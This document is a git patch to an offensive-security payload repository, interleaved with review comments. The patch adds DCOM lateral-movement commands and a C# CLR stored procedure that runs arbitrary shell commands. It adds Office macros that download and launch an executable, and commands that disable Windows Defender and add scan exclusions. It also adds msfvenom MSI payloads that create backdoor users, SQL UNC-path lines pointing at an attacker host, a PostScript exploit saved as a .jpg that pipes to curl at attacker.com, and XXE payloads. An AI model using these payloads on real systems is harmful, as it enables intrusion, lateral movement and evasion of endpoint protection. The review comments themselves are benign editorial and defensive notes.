From f6b9d63bf8cbbb9a27be6338cd37725ca93f4eec Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 24 Mar 2021 22:26:23 +0100 Subject: [PATCH] DCOM exploitation and MSSQL CLR --- .../Active Directory Attack.md | 75 ++++++++++++++- .../MSSQL Server - Cheatsheet.md | 96 ++++++++++++++++++- Methodology and Resources/Office - Attacks.md | 37 ++++++- .../Windows - AMSI Bypass.md | 6 ++ .../Windows - Privilege Escalation.md | 18 +++- .../Windows - Using credentials.md | 1 + SQL Injection/MSSQL Injection.md | 16 ++++ SQL Injection/README.md | 10 ++ .../ghostscript_rce_curl.jpg | 6 ++ XXE Injection/README.md | 41 ++++++++ 10 files changed, 296 insertions(+), 10 deletions(-) create mode 100644 Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index a3e58f8..38337c2 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -66,6 +66,10 @@ - [ReadLAPSPassword](#readlapspassword) - [ReadGMSAPassword](#readgmsapassword) - [ForceChangePassword](#forcechangepassword) + - [DCOM Exploitation](#dcom-exploitation) + - [DCOM via MMC Application Class](#dcom-via-mmc-application-class) + - [DCOM via Excel](#dcom-via-excel) + - [DCOM via ShellExecute](#dcom-via-shellexecute) - [Trust relationship between domains](#trust-relationship-between-domains) - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) - [Forest to Forest Compromise - Trust Ticket](#forest-to-forest-compromise---trust-ticket) 
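Review bot: The table of contents adds three DCOM entries, but the body hunk later in this file (`@@ -1712`) adds a fourth subsection, `#### DCOM via ShellBrowserWindow`, with no matching entry; add `  - [DCOM via ShellBrowserWindow](#dcom-via-shellbrowserwindow)` after the ShellExecute line so the anchor list stays complete. The same mismatch exists in `Office - Attacks.md`, whose TOC hunk adds the MMG entry but not the new `## DOCM - ActiveX-based (InkPicture control, Painted event) Autorun macro` section that the `@@ -443` hunk introduces.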
@@ -199,9 +203,9 @@ use [BloodHound](https://github.com/BloodHoundAD/BloodHound) .\SharpHound.exe -c all -d active.htb -SearchForest .\SharpHound.exe --EncryptZip --ZipFilename export.zip .\SharpHound.exe -c all,GPOLocalGroup -.\SharpHound.exe -c all --LDAPUser --LDAPPass --JSONFolder -.\SharpHound.exe -c all -d active.htb --LDAPUser --LDAPPass --domaincontroller 10.10.10.100 - +.\SharpHound.exe -c all --LdapUsername --LdapPassword --JSONFolder +.\SharpHound.exe -c all -d active.htb --LdapUsername --LdapPassword --domaincontroller 10.10.10.100 +.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23 # or run the collector on the machine using Powershell # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 @@ -1091,6 +1095,17 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll' PS > Get-DomainComputer COMPUTER -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime ``` +* LAPSToolkit - https://github.com/leoloobeek/LAPSToolkit + ```powershell + $ Get-LAPSComputers + ComputerName Password Expiration + ------------ -------- ---------- + exmaple.domain.local dbZu7;vGaI)Y6w1L 02/21/2021 22:29:18 + + $ Find-LAPSDelegatedGroups + $ Find-AdmPwdExtendedRights + ``` + * ldapsearch ```powershell ldapsearch -x -h  -D "@" -w  -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd` 
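Review bot: The sample `Get-LAPSComputers` output in the LAPSToolkit block misspells the host as `exmaple.domain.local`; readers copy these blocks, so it should read `example.domain.local`. The block also uses a `$ ` prompt inside a `powershell` code fence, whereas the `Get-DomainComputer` example just above it uses `PS > `; picking one prompt keeps the LAPS section consistent. The enclosing LAPS section continues outside the hunk.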
@@ -1712,6 +1727,58 @@ Set-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPassword ``` +### DCOM Exploitation + +> DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer + + +#### DCOM via MMC Application Class + +This COM object (MMC20.Application) allows you to script components of MMC snap-in operations. there is a method named **"ExecuteShellCommand"** under **Document.ActiveView**. + +```ps1 +PS C:\> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1")) +PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\calc.exe",$null,$null,7) +PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",$null,"-enc DFDFSFSFSFSFSFSFSDFSFSF < Empire encoded string > ","7") + +# Weaponized example with MSBuild +PS C:\> [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1")).Document.ActiveView.ExecuteShellCommand("c:\windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",$null,"\\10.10.10.2\webdav\build.xml","7") +``` + +Invoke-MMC20RCE : https://raw.githubusercontent.com/n0tty/powershellery/master/Invoke-MMC20RCE.ps1 + +#### DCOM via Excel + +```ps1 +# Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM +Invoke-Excel4DCOM64.ps1 https://gist.github.com/Philts/85d0f2f0a1cc901d40bbb5b44eb3b4c9 +Invoke-ExShellcode.ps1 https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a + +# Using Excel DDE +PS C:\> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName")) +PS C:\> $excel.DisplayAlerts = $false +PS C:\> $excel.DDEInitiate("cmd", "/c calc.exe") +``` + +#### DCOM via ShellExecute + +```ps1 +$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"10.10.10.1") +$obj = 
[System.Activator]::CreateInstance($com) +$item = $obj.Item() +$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) +``` + +#### DCOM via ShellBrowserWindow + +:warning: Windows 10 only, the object doesn't exists in Windows 7 + +```ps1 +$com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"10.10.10.1") +$obj = [System.Activator]::CreateInstance($com) +$obj.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) +``` + ### Trust relationship between domains * One-way @@ -2403,3 +2470,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [CVE-2020-17049: Kerberos Bronze Bit Attack – Theory - Jake Karnes - December 8th, 2020](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-theory/) * [Kerberos Bronze Bit Attack (CVE-2020-17049) Scenarios to Potentially Compromise Active Directory](https://www.hub.trimarcsecurity.com/post/leveraging-the-kerberos-bronze-bit-attack-cve-2020-17049-scenarios-to-compromise-active-directory) * [GPO Abuse: "You can't see me" - Huy Kha - July 19, 2019](https://pentestmag.com/gpo-abuse-you-cant-see-me/) +* [Lateral movement via dcom: round 2 - enigma0x3 - January 23, 2017](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/) +* [New lateral movement techniques abuse DCOM technology - Philip Tsukerman - Jan 25, 2018](https://www.cybereason.com/blog/dcom-lateral-movement-techniques) \ No newline at end of file diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md index 2b6fa34..f187e21 100644 --- a/Methodology and Resources/MSSQL Server - Cheatsheet.md +++ b/Methodology and Resources/MSSQL Server - Cheatsheet.md 
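Review bot: The warning under `#### DCOM via ShellBrowserWindow` should read `the object doesn't exist in Windows 7`, and `Windows 10 only` is stated without a source, so it deserves a hedge or a citation (the Cybereason post added in the references hunk may be it). The section documents only the offensive side; a one-line defender note would help, e.g. `Detection: the command presumably runs as a child of the hosting application on the target (mmc.exe, excel.exe or explorer.exe) following a remote DCOM activation — confirm in a lab before relying on it`. The DCOM Exploitation section begins inside this hunk but the Trust relationship section that follows continues outside it.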
@@ -27,6 +27,7 @@ * [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures) * [CLR Assemblies](#clr-assemblies) * [Execute commands using CLR assembly](#execute-commands-using-clr-assembly) + * [Manually creating a CLR DLL and importing it](#manually-creating-a-clr-dll-and-importing-it) * [OLE Automation](#ole-automation) * [Execute commands using OLE automation procedures](#execute-commands-using-ole-automation-procedures) * [Agent Jobs](#agent-jobs) @@ -217,6 +218,11 @@ Get-SQLStoredProcedureXP -Instance "" -Verbose ## CLR Assemblies +Prerequisites: +* sysadmin privileges +* CREATE ASSEMBLY permission (or) +* ALTER ASSEMBLY permission (or) + ### Execute commands using CLR assembly ```ps1 
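Review bot: The new prerequisites list has a dangling `(or)` on the last bullet, so it reads as three unrelated items; the intended meaning is presumably any one of the three, so write it as `* sysadmin privileges, or`, `* CREATE ASSEMBLY permission, or`, `* ALTER ASSEMBLY permission`. Since the steps in the next section turn `clr enabled` on, the list could also state that CLR stays off until someone enables it, which for defenders makes a `clr enabled` change an auditable event worth alerting on. The CLR Assemblies section continues outside the hunk.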
@@ -225,6 +231,93 @@ or Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "" -Command "powershell -e " -Verbose ``` +### Manually creating a CLR DLL and importing it + +Create a C# DLL file with the following content, with the command : `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\cmd_exec.cs` + +```csharp +using System; +using System.Data; +using System.Data.SqlClient; +using System.Data.SqlTypes; +using Microsoft.SqlServer.Server; +using System.IO; +using System.Diagnostics; +using System.Text; + +public partial class StoredProcedures +{ + [Microsoft.SqlServer.Server.SqlProcedure] + public static void cmd_exec (SqlString execCommand) + { + Process proc = new Process(); + proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe"; + proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value); + proc.StartInfo.UseShellExecute = false; + proc.StartInfo.RedirectStandardOutput = true; + proc.Start(); + + // Create the record and specify the metadata for the columns. + SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000)); + + // Mark the beginning of the result set. + SqlContext.Pipe.SendResultsStart(record); + + // Set values for each column in the row + record.SetString(0, proc.StandardOutput.ReadToEnd().ToString()); + + // Send the row back to the client. + SqlContext.Pipe.SendResultsRow(record); + + // Mark the end of the result set. + SqlContext.Pipe.SendResultsEnd(); + + proc.WaitForExit(); + proc.Close(); + } +}; +``` + +Then follow these instructions: + +1. Enable `show advanced options` on the server + ```sql + sp_configure 'show advanced options',1; + RECONFIGURE + GO + ``` +2. Enable CLR on the server + ```sql + sp_configure 'clr enabled',1 + RECONFIGURE + GO + ``` +3. Import the assembly + ```sql + CREATE ASSEMBLY my_assembly + FROM 'c:\temp\cmd_exec.dll' + WITH PERMISSION_SET = UNSAFE; + ``` +4. 
Link the assembly to a stored procedure + ```sql + CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec]; + GO + ``` +5. Execute and clean + ```sql + cmd_exec "whoami" + DROP PROCEDURE cmd_exec + DROP ASSEMBLY my_assembly + ``` + +**CREATE ASSEMBLY** will also accept an hexadecimal string representation of a CLR DLL + +```sql +CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM +0x4D5A90000300000004000000F[TRUNCATED] +WITH PERMISSION_SET = UNSAFE +GO +``` ## OLE Automation @@ -436,4 +529,5 @@ SELECT SYSTEM_USER ## References * [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3) -* [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet) \ No newline at end of file +* [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet) +* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/) \ No newline at end of file diff --git a/Methodology and Resources/Office - Attacks.md b/Methodology and Resources/Office - Attacks.md index f15cc2a..39b8acd 100644 --- a/Methodology and Resources/Office - Attacks.md +++ b/Methodology and Resources/Office - Attacks.md 
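Review bot: Step 3 (`CREATE ASSEMBLY ... WITH PERMISSION_SET = UNSAFE`) is written as if it always succeeds, but on SQL Server 2017 and later the `clr strict security` option is enabled by default and rejects UNSAFE assemblies that are not explicitly trusted; the page should carry that version caveat, and for defenders that option is the control to verify alongside `clr enabled` and any audit on `CREATE ASSEMBLY`. In the C# sample, `proc.StandardOutput.ReadToEnd().ToString()` has a redundant `.ToString()`, and the output goes into a single `NVarChar` column declared with length 4000, so longer output is not handled — a comment such as `// output is capped by the 4000-char SqlMetaData; longer results are not handled` would set expectations. The trailing `};` after the class body is legal C# but unconventional; `}` suffices.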
@@ -13,11 +13,12 @@ * [DOCM - C# converted to Office VBA macro](#docm---c-converted-to-office-vba-macro) * [DOCM - VBA Wscript](#docm---vba-wscript) * [DOCM - VBA Shell Execute Comment](#docm---vba-shell-execute-comment) -* [DOCM - VBA Spawning via svchost.exe using Scheduled Task](#docm---vba-spawning-via-svchost-exe-using-scheduled-task) -* [DCOM - WMI COM functions (VBA AMSI)](#docm---wmi-com-functions-vba-amsi) +* [DOCM - VBA Spawning via svchost.exe using Scheduled Task](#docm---vba-spawning-via-svchostexe-using-scheduled-task) +* [DCOM - WMI COM functions (VBA AMSI)](#docm---wmi-com-functions) * [DOCM - winmgmts](#docm---winmgmts) -* [DOCM - Macro Pack - Macro and DDE](#dcom---macro-pack---macro-and-dde) +* [DOCM - Macro Pack - Macro and DDE](#docmxlm---macro-pack---macro-and-dde) * [DOCM - CACTUSTORCH VBA Module](#docm---cactustorch-vba-module) +* [DOCM - MMG with Custom DL + Exec](#docm---mmg-with-custom-dl--exec) * [VBA Obfuscation](#vba-obfuscation) * [VBA Purging](#vba-purging) * [OfficePurge](#officepurge) @@ -221,6 +222,12 @@ Sub Auto_Open() End Sub ``` +```vb +CreateObject("WScript.Shell").Run "calc.exe" +CreateObject("WScript.Shell").Exec "notepad.exe" +``` + + ## DOCM - VBA Shell Execute Comment Set your command payload inside the **Comment** metadata of the document. @@ -271,6 +278,8 @@ Rem powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadst ## DOCM - WMI COM functions +Basic WMI exec (detected by Defender) : `r = GetObject("winmgmts:\\.\root\cimv2:Win32_Process").Create("calc.exe", null, null, intProcessID)` + ```ps1 Sub wmi_exec() strComputer = "." @@ -307,6 +316,11 @@ Sub AutoOpen() End Sub ``` +```ps1 +Const ShellWindows = "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}" +Set SW = GetObject("new:" & ShellWindows).Item() +SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe", "C:\Windows\System32", Null, 0 +``` ## DOCM/XLM - Macro Pack - Macro and DDE 
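Review bot: The new `Const ShellWindows ... SW.Document.Application.ShellExecute` block in the `@@ -307` hunk is VBScript/VBA but is fenced as `ps1`, while the `@@ -416` hunk of this same commit changes a sibling VBA block from `ps1` to `vb`; use a `vb` fence here too so highlighting is consistent. The `{9BA05972-F6A8-11CF-A442-00A0C90A8F39}` CLSID is the same ShellWindows object the Active Directory page's `DCOM via ShellExecute` section uses, so a cross-reference between the two pages would let defenders track one technique rather than two.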
@@ -416,7 +430,7 @@ python MMG.py configs/generic-cmd.json malicious.vba } ``` -```ps1 +```vb Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Public Function DownloadFileA(ByVal URL As String, ByVal DownloadPath As String) As Boolean @@ -443,6 +457,18 @@ Sub Auto_Open() End Sub ``` +## DOCM - ActiveX-based (InkPicture control, Painted event) Autorun macro + +Go to **Developer tab** on ribbon `-> Insert -> More Controls -> Microsoft InkPicture Control` + +```vb +Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle) +Run = Shell("cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile('https:///file.exe','file.exe');Start-Process 'file.exe'", vbNormalFocus) +End Sub +``` + + + ## VBA Obfuscation ```ps1 @@ -619,4 +645,5 @@ E * [WordAMSIBypass - rmdavy](https://github.com/rmdavy/WordAmsiBypass) * [Dechaining macros and evading EDR - Noora Hyvärinen](https://blog.f-secure.com/dechaining-macros-and-evading-edr/) * [Executing macros from docx with remote - RedXORBlueJuly 18, 2018](http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html) -* [One thousand and one ways to copy your shellcode to memory (VBA Macros) - X-C3LL - Feb 18, 2021](https://adepts.of0x.cc/alternatives-copy-shellcode/) \ No newline at end of file +* [One thousand and one ways to copy your shellcode to memory (VBA Macros) - X-C3LL - Feb 18, 2021](https://adepts.of0x.cc/alternatives-copy-shellcode/) +* [Running macros via ActiveX controls - greyhathacker - September 29, 2016](http://www.greyhathacker.net/?p=948) \ No newline at end of file diff --git a/Methodology and Resources/Windows - AMSI Bypass.md b/Methodology and Resources/Windows - AMSI Bypass.md index ff80a25..813206c 100644 --- a/Methodology and Resources/Windows - AMSI Bypass.md 
+++ b/Methodology and Resources/Windows - AMSI Bypass.md @@ -17,6 +17,7 @@ * [Use Powershell Version 2 - No AMSI Support there](#Using-PowerShell-version-2) * [Nishang all in one](#Nishang-all-in-one) * [Adam Chesters Patch](#Adam-Chester-Patch) +* [AMSI.fail](#amsifail) ## Which Endpoint Protection is Using AMSI @@ -735,6 +736,11 @@ Add-Type -TypeDefinition $Winpatch -Language CSharp [patch]::it() ``` +## AMSI.fail + +> AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures. - https://amsi.fail/ + + ## References * [S3cur3Th1sSh1t - Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/blob/master/README.md) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 9d3ee8b..4a51f64 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -254,6 +254,8 @@ Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse ## Antivirus & Detections +Enumerate antivirus on a box with `WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName` + ### Windows Defender ```powershell @@ -263,6 +265,13 @@ PS C:\> Get-MpComputerStatus # disable Real Time Monitoring PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus PS C:\> Set-MpPreference -DisableIOAVProtection $true + +# disable AMSI (set to 0 to enable) +PS C:\> Set-MpPreference -DisableScriptScanning 1 + +# exclude a folder +PS C:\> Add-MpPreference -ExclusionPath "C:\Temp" +PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks" ``` ### AppLocker Enumeration 
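Review bot: `WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName` only works on client editions of Windows; the `SecurityCenter2` namespace is not present on Windows Server, where the query errors out, so the sentence should say so, e.g. `Enumerate antivirus on a workstation (the SecurityCenter2 namespace does not exist on Windows Server) with ...`. `wmic.exe` is also deprecated on recent Windows builds, so a `Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct` equivalent would age better.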
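Review bot: The comment `# disable AMSI (set to 0 to enable)` overstates what `Set-MpPreference -DisableScriptScanning 1` does: it turns off Defender's script scanning, not AMSI itself, which stays in place for any other registered provider, so reword it to `# disable Defender script scanning (does not remove AMSI itself; set to 0 to re-enable)`. For readers on the defensive side it is worth adding that every `Set-MpPreference`/`Add-MpPreference` change in this block requires local administrator rights and is recorded in the Defender operational log as a configuration-change event (ID 5007), which is what to alert on. The Windows Defender section continues outside the hunk.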
@@ -777,16 +786,23 @@ Check if these registry values are set to "1". ```bat $ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated $ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated + +$ Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer +$ Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer ``` Then create an MSI package and install it. ```powershell $ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi +$ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi-nouac -o evil.msi $ msiexec /quiet /qn /i C:\evil.msi ``` -Technique also available in Metasploit : `exploit/windows/local/always_install_elevated` +Technique also available in : +* Metasploit : `exploit/windows/local/always_install_elevated` +* PowerUp.ps1 : `Get-RegistryAlwaysInstallElevated`, `Write-UserAddMSI` + ## EoP - Insecure GUI apps diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 998d47b..5115002 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -202,6 +202,7 @@ PS C:\> wmic /node:target.domain /user:domain\user /password:password process ca ## Psexec.py / Smbexec.py / Wmiexec.py From [Impacket](https://github.com/SecureAuthCorp/impacket) (:warning: renamed to impacket-xxx in Kali) +:warning: `get` / `put` for wmiexec, psexec, smbexec, and dcomexec are changing to `lget` and `lput`. ```powershell root@payload$ git clone https://github.com/CoreSecurity/impacket.git diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index c4edcef..8e75bbd 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md 
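Review bot: The two added `Get-ItemProperty HKLM\Software\...` and `HKCU\Software\...` lines will not work as written in PowerShell: registry paths need the provider drive prefix, i.e. `Get-ItemProperty HKLM:\Software\Policies\Microsoft\Windows\Installer` and `Get-ItemProperty HKCU:\Software\Policies\Microsoft\Windows\Installer`; without the colon PowerShell resolves them as file-system paths relative to the current directory. They are also PowerShell cmdlets placed inside the `bat` fence that holds the `reg query` commands, so they belong in their own `powershell` block. The AlwaysInstallElevated section starts outside the hunk.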
@@ -208,6 +208,21 @@ MSSQL supports stacked queries so we can create a variable pointing to our IP ad 1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';-- ``` +```sql +xp_dirtree '\\attackerip\file' +xp_fileexist '\\attackerip\file' +BACKUP LOG [TESTING] TO DISK = '\\attackerip\file' +BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file' +RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file' +RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file' +RESTORE HEADERONLY FROM DISK = '\\attackerip\file' +RESTORE FILELISTONLY FROM DISK = '\\attackerip\file' +RESTORE LABELONLY FROM DISK = '\\attackerip\file' +RESTORE REWINDONLY FROM DISK = '\\attackerip\file' +RESTORE VERIFYONLY FROM DISK = '\\attackerip\file' +``` + + ## MSSQL Make user DBA (DB admin) ```sql @@ -252,3 +267,4 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT * [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links) * [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/) * [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT) +* [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e) \ No newline at end of file diff --git a/SQL Injection/README.md b/SQL Injection/README.md index dfa09e5..43240b8 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md 
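Review bot: The `BACKUP DATABASE` line uses the placeholder `\\attackeri\file` while the other ten lines use `\\attackerip\file`; it is a copy error and the placeholder should be the same throughout, otherwise readers assume a different meaning. The list gives no defender context; a sentence noting that each of these statements makes the SQL Server service account open an outbound SMB connection to the named host — so egress filtering of TCP 445 from database servers and alerting on UNC paths in `BACKUP`/`RESTORE`/`xp_dirtree` calls are the matching controls — would round it out. The nullbind UNC path injection cheatsheet added in the `@@ -252` hunk is presumably the source and could be cited next to the block.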
@@ -30,6 +30,7 @@ Attempting to manipulate SQL queries may have goals including: * [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy) * [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection) * [General tamper option and tamper's list](#general-tamper-option-and-tampers-list) + * [SQLmap without SQL injection](#sqlmap-without-sql-injection) * [Authentication bypass](#authentication-bypass) * [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1) * [Polyglot injection](#polyglot-injection-multicontext) @@ -200,6 +201,7 @@ sqlmap -u "https://test.com/index.php?id=99" --load-cookie=/media/truecrypt1/TI/ python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- " ``` + ### General tamper option and tamper's list ```powershell @@ -267,6 +269,14 @@ tamper=name_of_the_tamper |versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment | |xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'| +### SQLmap without SQL injection + +You can use SQLmap to access a database via its port instead of a URL. + +```ps1 +sqlmap.py -d "mysql://user:pass@ip/database" --dump-all +``` + ## Authentication bypass ```sql diff --git a/Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg b/Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg new file mode 100644 index 0000000..05a276d --- /dev/null +++ b/Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg @@ -0,0 +1,6 @@ +%!PS +userdict /setpagedevice undef +legal +{ null restore } stopped { pop } if +legal +mark /OutputFile (%pipe%curl http://attacker.com/?a=callback) currentdevice putdeviceprops \ No newline at end of file diff --git a/XXE Injection/README.md b/XXE Injection/README.md index 47eb992..8607304 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md 
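Review bot: The new file `Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg` is PostScript with a `.jpg` extension and nothing in this commit references it — the diffstat shows no change to that directory's README — so readers get no statement of what it demonstrates (a `%pipe%` output device invoked when ImageMagick delegates the upload to Ghostscript), which Ghostscript versions are affected, or the mitigation. A short README entry should at least name the control: keep Ghostscript patched and disable the PS/EPS/PDF/XPS coders in ImageMagick's `policy.xml` so uploaded images are never handed to Ghostscript. The `attacker.com` callback host is a real, registered domain; an RFC 2606 reserved name such as `example.com` would avoid accidental traffic from anyone who runs the sample.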
@@ -26,6 +26,7 @@ Syntax: `` - [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013) - [XXE OOB with DTD and PHP filter](#xxe-oob-with-dtd-and-php-filter) - [XXE OOB with Apache Karaf](#xxe-oob-with-apache-karaf) +- [Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents](#windows-local-dtd-and-side-channel-leak-to-disclose-http-responsefile-contents) - [XXE in exotic files](#xxe-in-exotic-files) - [XXE inside SVG](#xxe-inside-svg) - [XXE inside SOAP](#xxe-inside-soap) @@ -250,6 +251,9 @@ i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] ``` + + + ## Exploiting blind XXE to exfiltrate data out-of-band Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack. @@ -372,6 +376,43 @@ Assuming payloads such as the previous return a verbose error. You can start poi [Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md) + +## Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents + +From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79 + +### Disclose local file + +```xml + + + + "> + %eval; + %error; + + %local_dtd; + ]>cacat +``` + +### Disclose HTTP Response: + +```xml + + + + "> + %eval; + %error; + + %local_dtd; + ]>cacat +``` + ## XXE in exotic files ### XXE inside SVG